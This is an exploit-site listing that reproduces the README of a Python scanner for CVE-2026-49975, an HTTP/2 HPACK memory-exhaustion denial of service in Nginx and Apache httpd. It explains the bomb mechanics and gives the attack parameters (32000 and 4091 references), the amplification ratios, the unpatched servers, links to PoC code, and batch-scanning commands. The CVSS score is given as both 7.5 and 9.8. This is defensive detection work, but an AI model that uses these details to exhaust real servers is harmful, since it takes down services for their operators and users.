Exploit for Memory Allocation with Excessive Size Value in Apache Http_Server CVE-2026-49975

Name: Exploit for Memory Allocation with Excessive Size Value in Apache Http_Server CVE-2026-49975
Rating: 5 (60 reviews)
2026-06-13 | CVSS 7.5
## https://sploitus.com/exploit?id=C2EB4AA1-0C70-5104-AF4C-BC274F5A5B7A
# http2-bomb-detector

> HTTP/2 Bomb (CVE-2026-49975) Non-destructive vulnerability detection tool — for Nginx / Apache httpd

## Vulnerability Background

CVE-2026-49975 is a widely affected remote denial-of-service vulnerability in the HTTP/2 protocol layer, discovered by security researcher Quang Luong. This vulnerability exploits the combined design flaws of **HPACK header compression** and **stream control mechanisms**. An attacker can exhaust 32GB of server memory within 10–20 seconds without authentication.  
- **CVSS 3.1**: 9.8 (High Risk)  
- **CWE**: CWE-789 (Memory allocation with excessive size value)  
- **Alias**: QVD-2026-30962  
- **Publication Date**: 2026-06-02  
- **PoC**: [beichenst/http2-bomb](https://github.com/beichenst/http2-bomb) | [califio/publications](https://github.com/califio/publications/tree/main/MADBugs/http2-bomb)

## Impact Scope

| Server | Affected Versions | Magnification | Fix Status |
|--------|-------------------|--------------|------------|
| Apache httpd | 2.4.17 – 2.4.67 (mod_http2 < 2.0.41) | ~4,000:1 | ✅ Fixed |
| Nginx | < 1.29.8 | ~70:1 | ✅ Fixed |
| Envoy | ≤ 1.37.2 | ~5,700:1 | ❌ Not fixed |
| Microsoft IIS | Including Windows Server 2025 | ~68:1 | ❌ Not fixed |
| Cloudflare Pingora | ≤ 0.8.0 | ~62:1 | ❌ Not fixed |

## Detection Mechanism

This tool is implemented based on real PoCs and uses two detection modes:

### Nginx Mode
Detect **Index reference bombs**: Insert dynamic table entries (`("a", ""`)), then send index references. Each reference is 1 byte on the client side → 59 bytes of server memory (3B pool copy + 56B `ngx_table_elt_t`). Attack parameter: refs=32000; Detection only requires refs=3.  
### Apache Mode
Detect **Cookie crumb merging bombs**: Utilize the Cookie merging mechanism in `mod_http2` (`.apr_table_setn` uses `"; "` to concatenate duplicate cookies). The merged cookies are not counted in `LimitRequestFields`. Attack parameter: refs=4091 (magnification ~4000:1); Detection only requires refs=3.  
### Decision Logic
- If the server returns `ENHANCE_YOUR_CALM` → 🛡️ Protection deployed
- If the server rejects `RST_STREAM` → 🛡️ Protection in place
- If the server returns `GOAWAY` → 🛡️ Protection in place
- If the server silently accepts → ⚠️ Possibly affected

## Installation

**Zero dependencies**, using only Python standard libraries (`ssl`, `socket`, `struct`).  
```bash
git clone https://github.com/adminlove520/http2-bomb-detector.git
cd http2-bomb-detector
```

Python 3.7+ required.  
## Usage

### Single-target Detection

```bash
# Automatic detection (Nginx + Apache modes)
python http2_bomb_detector.py --host example.com
```

### Specify Modes

python http2_bomb_detector.py --host example.com --mode nginx
python http2_bomb_detector.py --host example.com --mode httpd

# Specify the port
python http2_bomb_detector.py --host example.com --port 8443

# Output only vulnerability information without sending probe packets
python http2_bomb_detector.py --host example.com --no-probe

# Output in JSON format
python http2_bomb_detector.py --host example.com --json
```

### Batch detection

```bash
# Read the target list from a file
python http2_bomb_detector.py -f targets.txt

# Output the report
python http2_bomb_detector.py -f targets.txt -o report.txt
```

The `targets.txt` format (one line per entry, starting with `#` as a comment):
```
# List of web servers
example.com
https://example.org:8443
192.168.1.100
```

## Output example

```
  [INFO] Connected to example.com:443... [OK] HTTP/2 connection established
  [INFO] --- NGINX mode detection---
  [INFO] Attack vector: HPACK index referencing bombs: Dynamic table entries ('a','') × 32000 references
  [INFO] Fix version: 1.29.8 | Magnification ratio: ~70:1
  [INFO] Sending probe packet (refs=3, non-destructive)... [WARN] ⚠️ The server silently accepts probe packets — potentially vulnerable! [INFO] --- HTTPD mode detection---
  [INFO] Attack vector: Cookie crumb merging bombs: Empty cookies × 4091 references
  [INFO] Fix version: mod_http2 2.0.41 / httpd 2.4.68 | Magnification ratio: ~4000:1
  [INFO] Sending probe packet (refs=3, non-destructive)... [OK] The server’s RST_STREAM rejects the probe stream — protected
```

## Disclaimer

This tool is only used for **authorized security testing**. Using this tool to detect unauthorized targets may violate laws. The user assumes all legal responsibilities.

## References

- [CVE-2026-49975 - NVD](https://nvd.nist.gov/vuln/detail/CVE-2026-49975)
- [Apache HTTP Server security bulletins](https://httpd.apache.org/security/vulnerabilities_24.html)
- [Original research blog on HTTP/2 bombs](https://blog.calif.io/p/codex-discovered-a-hidden-http2-bomb)
- [PoC code repository (beichenst)](https://github.com/beichenst/http2-bomb)
- [RFC 7541 - HPACK](https://www.rfc-editor.org/rfc/rfc7541)
- [RFC 9113 - HTTP/2](https://www.rfc-editor.org/rfc/rfc9113)

## License

MIT